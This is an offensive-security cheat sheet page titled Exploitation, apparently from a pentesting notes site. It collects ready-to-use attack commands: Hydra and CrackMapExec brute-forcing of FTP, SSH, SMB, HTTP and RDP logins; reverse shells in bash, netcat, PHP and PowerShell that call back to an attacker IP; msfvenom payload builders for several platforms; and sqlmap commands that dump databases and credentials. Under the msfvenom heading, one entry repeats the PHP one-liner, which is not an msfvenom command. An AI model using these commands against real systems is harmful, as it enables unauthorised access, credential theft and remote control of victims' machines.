Exploitation

Exploitation

Brute-Forcing

# Brute-Force FTP With Hydra
hydra -L <users.txt> -P <passwords.txt> ftp://<ip>

# Brute-Force SSH With Hydra
hydra -L <users.txt> -P <passwords.txt> ssh://<ip>

# Brute-Force SMB With CrackMapExec
cme smb <ip> -u <users.txt> -p <passwords.txt> --shares

# Brute-Force SMB With Hydra
hydra -L <users.txt> -P <passwords.txt> smb://<ip>

# Brute-Force HTTP With Hydyra
(GET REQUEST) hydra -L <users.txt> -P <passwords.txt> <ip> http-get /<login>
(POST REQUEST) hydra -l <users.txt> -P <passwords.txt> <ip> http-post-form "/<login>:user=^USER^&pass=^PASS^:F=Incorrect"

# Brute-Force RDP With Hydra
hydra -L <users.txt> -P <passwords.txt> rdp://<ip>

Look for Vulnerabilities

# Find for known Vulnerabilities (CVEs)
searchsploit <Service> <Version>
# Find for metasploit Vulnerabilities
service postgresql start && msfconsole
...
search <service> <version>

Reverse Shells

# Bash Reverse Shell (Linux)
bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1

# Netcat Reverse Shell (with -e option)
nc -e /bin/bash <attacker_ip> <port>

# PHP Reverse Shell (command injection or file upload)
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell Reverse Shell (Windows)
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker_ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}

# Convert web shell to RCE
bash -c "bash -i >%26 /dev/tcp/<ip>/<port> 0>%261"

# Listener
nc -lvnp <port>

# Upgrade to full TTY (Linux)
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo; fg
export TERM=xterm

Msfvenom Payloads

# Generate Linux Reverse Shell ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f elf > shell.elf

# Generate Windows Reverse Shell EXE
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f exe > shell.exe

# Generate PHP Reverse Shell (command injection or file upload)
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

# Generate ASP Reverse Shell (for IIS)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f asp > shell.asp

# Generate WAR Reverse Shell (for Apache Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f war > shell.war

# Generate PowerShell Reverse Shell (as .ps1)
msfvenom -p windows/powershell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f psh > shell.ps1

# Generate Java Reverse Shell (JAR)
msfvenom -p java/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f jar > shell.jar

# Show all payloads (interactive)
msfvenom -l

SQL Exploitation with SQLMAP

# Detect SQL Injection in a URL
sqlmap -u "http://<ip>/page.php?id=1" --batch --level=3 --risk=2

# Bypass login form (GET or POST)
sqlmap -u "http://<ip>/login.php" --data="username=admin&password=admin" --batch --dbs

# List databases
sqlmap -u "http://<ip>/?id=1" --batch --dbs

# List tables from a specific DB
sqlmap -u "http://<ip>/?id=1" --batch -D <database_name> --tables

# Dump data from a table
sqlmap -u "http://<ip>/?id=1" --batch -D <database_name> -T <table_name> --dump

# Extract credentials from db
sqlmap -u "http://<ip>/?id=1" --batch -D users -T credentials --dump

# Use cookie/session in injection
sqlmap -u "http://<ip>/page.php?id=1" --cookie="PHPSESSID=abcd1234" --batch
PreviousHost Discovery & ReconnaissanceNextPrivilege Escalation

Last updated